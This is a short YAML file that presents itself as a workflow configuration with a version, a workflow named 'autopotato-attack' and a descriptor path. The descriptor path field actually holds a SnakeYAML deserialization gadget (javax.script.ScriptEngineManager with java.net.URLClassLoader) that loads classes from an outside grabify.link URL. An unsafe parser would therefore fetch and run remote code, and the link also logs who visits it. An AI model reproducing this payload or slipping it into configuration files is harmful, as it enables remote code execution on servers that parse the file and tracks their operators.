version: 1.2
workflows:
   - subclass: CWL
     name: autopotato-attack
     publish: True
     primaryDescriptorPath: |
        !!javax.script.ScriptEngineManager [  
           !!java.net.URLClassLoader [[  
                !!java.net.URL ["https://grabify.link/FTRHRF"]  
           ]]  
        ] 
